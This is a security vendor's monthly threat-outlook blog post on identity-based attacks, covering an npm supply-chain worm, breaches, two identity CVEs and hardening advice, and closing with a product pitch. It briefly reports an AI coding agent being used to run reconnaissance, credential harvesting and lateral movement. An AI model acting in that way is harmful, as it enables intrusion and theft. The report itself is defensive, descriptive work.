Delinea Labs December 2025 Threat Outlook
The Delinea Labs research team has been digging into threat reports, monitoring identity-driven attacks, and analyzing how the landscape has shifted over the past month.
November 2025 made one thing abundantly clear: attackers no longer need to “break in” when they can just authenticate their way through the front door.
Identity shaped the entire threat landscape over the past month. Everything from supply chain malware to AI-assisted espionage depended on the ability to exploit trust relationships quickly and quietly.
Here’s what we can expect next based on the patterns we’ve tracked.
The big theme: Authentication without authorization
November revealed a shift in attacker behavior. Instead of bypassing authentication, intruders are using systems exactly as they were designed to work. Tokens, service accounts, SCIM provisioning flows, and SaaS integrations are becoming the easiest paths in.
Two incidents captured the scale of the change:
- Shai-Hulud 2.0 attacked the npm ecosystem by targeting developers rather than code. The worm collected CI tokens, cloud keys, and automation secrets through malicious preinstall scripts. It spread by signing into developer tools and services with legitimate credentials.
- An AI-supported espionage campaign compressed the entire intrusion lifecycle down to hours. Anthropic identified an attacker using Claude Code to run recon, harvest credentials, escalate privileges, and pivot across environments at machine speed. AI didn’t just assist with the intrusion; it accelerated it.
These events demonstrate that identity has become the medium through which attackers operate, not the hurdle they need to clear.
What we’re seeing at Delinea Labs: Identity abuse is getting faster
Our own telemetry showed that identity misuse is picking up speed. AI is shortening every step of an intrusion, and identity is where attackers are gaining the most leverage.
Key observations from the past month:
- Misconfigured identity systems outpaced endpoint exploits as entry points
- Token theft is replacing password theft because tokens leave fewer traces
- Machine identities are driving lateral movement as attackers lean on unattended service accounts and stale secrets
- Ransomware operations now begin with identity compromise, with groups like Clop and Qilin abusing VPN credentials and unprotected admin accounts to establish a foothold
These trends suggest December will bring even more automated identity probing and session hijacking.
Major breaches and vulnerabilities
From developer-focused supply chain worms to AI-assisted espionage, attackers are exploiting tokens, stale service accounts, and misconfigurations to move faster and penetrate deeper than ever. The following breaches and vulnerabilities illustrate exactly how identity is being weaponized and why protecting both human and machine identities is now essential.
Shai-Hulud 2.0 – npm supply chain worm
- Malicious preinstall scripts exfiltrated environment variables, CI/CD tokens, and cloud keys, then used these credentials to propagate across other packages.
Anthropic AI-assisted espionage campaign
- Autonomous AI performed reconnaissance, credential harvesting, privilege escalation, and lateral movement across financial, technology, and public sector targets.
EY – Asure SQL backup exposure
- A cloud-storage misconfiguration exposed 4 TB of data, including hashed credentials and authentication artifacts.
Habib Bank AG Zurich – Qilin data theft
- Attackers leveraged compromised privileged identities and service accounts to exfiltrate internal banking data.
Mixpanel – analytics token exposure
- A leaked project token allowed unauthorized access to analytics event data, illustrating that even limited tokens can enable identity-based attacks.
Identity vulnerabilities
- CVE-2025-47151 (Lasso SAML type confusion)—crafted SAML responses can execute arbitrary code, potentially compromising entire federation chains
- CVE–2025–41115 (Grafana SCIM privilege escalation)—provisioning flaws allowed attackers to impersonate admins and escalate privileges
What enterprises should focus on next
Based on December’s activity, security teams should focus on:
1. Enforce MFA and adaptive authentication
- Require MFA across all identity providers, privileged roles, admin workflows, and servers
- Remove legacy exceptions and enforce adaptive policies based on risk
2. Audit and harden identity configurations
- Review IdPs, SCIM connectors, SAML configurations, and cloud IAM roles
- Reduce misconfigurations, excessive permissions, and drift from least-privilege principles
3. Rotate secrets and reduce standing privilege
- Remove stale service accounts, rotate long-lived tokens, and enforce just-in-time access
- Limit local admin rights to reduce privilege escalation risks
4. Secure developer and automation workflows
- Vault CI/CD and automation credentials
- Remove secrets from local environments and require dual-approval or AI-assisted checks for sensitive operations
5. Monitor identity behavior continuously
- Detect anomalies in sessions, token use, and privileged account activity
- Track lateral movement, suspicious provisioning, and automation abuse
6. Harden identity infrastructure protections
- Patch SAML, SCIM, IAM, and federation platforms promptly
- Validate provisioning chains and enforce layered access controls
7. Prepare for AI-accelerated attacks
- Reduce attack surface and minimize exposed credentials
- Shorten detection and response cycles, assuming intrusions may operate at machine speed
It’s clear that identity is now the frontline of every enterprise defense. Attackers are moving faster, targeting tokens, service accounts, and automation credentials. They’re also leveraging AI to accelerate attacks. Organizations that proactively secure, monitor and manage all aspects of human and machine identities will enter 2026 with a resilient foundation. Those who delay will continue to fall behind.
Find out how you can stay ahead of AI-assisted and supply-chain attacks with the Delinea Platform powered by Iris AI while protecting every human and machine identity across the enterprise.
